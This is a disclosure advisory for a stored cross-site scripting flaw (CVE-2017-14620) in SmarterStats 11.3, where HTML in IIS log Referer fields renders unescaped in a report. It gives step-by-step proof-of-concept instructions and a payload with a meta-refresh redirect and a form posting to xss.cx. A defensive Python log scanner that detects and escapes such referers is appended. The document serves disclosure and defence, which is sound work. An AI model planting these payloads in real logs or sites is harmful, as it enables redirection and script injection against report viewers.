TL;DR CVE-2017-14620 SmarterStats V11.3.6347 will Render HTML Tags from the Referer Field of HTTP Logfiles
SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in the report served at the URL /Data/Reports/ReferringURLsWithQueries
David Hoyt | XSS.Cx
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:M/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:N/MA:N
Base Score 4.3, Temporal Score: 4.1, Environmental Score: 4.1
CVE-2017-14620, CWE-533, CWE-532, CWE-117, CWE-93, CAPEC-86, CAPEC-79, Stored Document Object Model Cross Site Scripting (Stored DOM XSS), Cross-Site Request Forgery (CSRF), Open Redirection, HTTP Logfiles, Exploit, PoC, HTML Tags, SmarterStats 11.3
SmarterStats Version 11.3
HTTP Proxy (BurpSuite, Fiddler)
Web Browser (Chrome - Current/Stable)
User Interaction Required - See Picture #1 - Must Click Referer Link Report
Picture #1
Step 1: Test with an HTTP Logfile containing a URL-encoded String to the Referer Field with classic HTML Tags to be Rendered in a Browser:
http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/></form>\n<script>!function(e,t){var n,i;return!e.navigator&form=##&sc=#&sp=-#&qs=n&sk=z
Step 2: Verify that the Injected Entry is present in the IIS Logfile (Open the Log, Verify) as seen below in Picture #2
Step 3: Process the Logfiles, Select the Referer URL Report. In an HTTP Proxy, watch the URL http://localhost:9999/Data/Reports/ReferringURLsWithQueries when Browsing http://localhost:9999/Default.aspx in Chrome (current/stable).
Step 4: Verify the Result in your HTTP Proxy returned from the Server:
{"c":[{"v":"http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/></form>\n<script>!function(e,t){var n,i;return!e.navigator&form=MSNH14&sc=8-4&sp=-1&qs=n&sk="},{"v":"2","f":"2"}]}
In your Browser, the HTTP Response will cause a GET to xss.cx after 5 seconds.
Verify in HTTP Proxy.
...
GET / HTTP/1.1
Host: xss.cx
...
Step 5: Watch your Browser get Redirected to XSS.Cx.
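As an added defender-side example (not SmarterStats code), the script below parses constructed IIS W3C log lines, flags any cs(Referer) value that decodes to HTML markup such as the meta-refresh used above, and shows the HTML-escaped form a report must emit before the value reaches the DOM. The log lines, the placeholder host example.invalid and the function names are all assumptions made for this example.

```python
"""Flag IIS W3C log entries whose cs(Referer) carries HTML markup.

Added example, not part of the advisory or of SmarterStats; the log
lines below are constructed and example.invalid is a placeholder host.
"""
import html
import re
from urllib.parse import unquote

# Constructed sample: a #Fields header plus two requests. The second
# request carries a URL-encoded <meta refresh> tag in cs(Referer).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs(User-Agent) cs(Referer) sc-status
2017-09-19 10:00:01 10.0.0.5 GET /index.html - 80 Mozilla/5.0 http://www.bing.com/search?q=smarterstats 200
2017-09-19 10:00:02 10.0.0.5 GET /index.html - 80 Mozilla/5.0 http://www.bing.com/search?q=%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%225%3B%20url%3Dhttp%3A%2F%2Fexample.invalid%2F%22%3E 200
"""

# Anything that looks like an opening or closing HTML tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the latest #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def suspicious_referers(text):
    """Return (decoded_referer, html_escaped_referer) for every entry whose
    referer decodes to a string containing an HTML tag.

    The second element is what a report should insert into the page
    (or set via textContent) instead of the raw value."""
    hits = []
    for entry in parse_w3c(text):
        decoded = unquote(entry.get("cs(Referer)", "-"))
        if TAG_RE.search(decoded):
            hits.append((decoded, html.escape(decoded, quote=True)))
    return hits


if __name__ == "__main__":
    for raw, safe in suspicious_referers(SAMPLE_LOG):
        print("markup in referer:", raw)
        print("escaped for HTML :", safe)
```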
Summary: The Referer Field in IIS Logfiles, and possibly other Field Names, is Rendered unescaped by SmarterStats Version 11.3.6347, a classic Stored DOM XSS.
Bug Hunters should Inject a Custom URL into the Referer as a Callback from the Victim Site capturing the DOM and other evidence when Rendered.
HTTP Proxy - Burp Suite
Reported to SmarterTools on September 19, 2017
Obtained CVE from MITRE on September 20, 2017
Resolved September 28, 2017 with Version 11.3.6480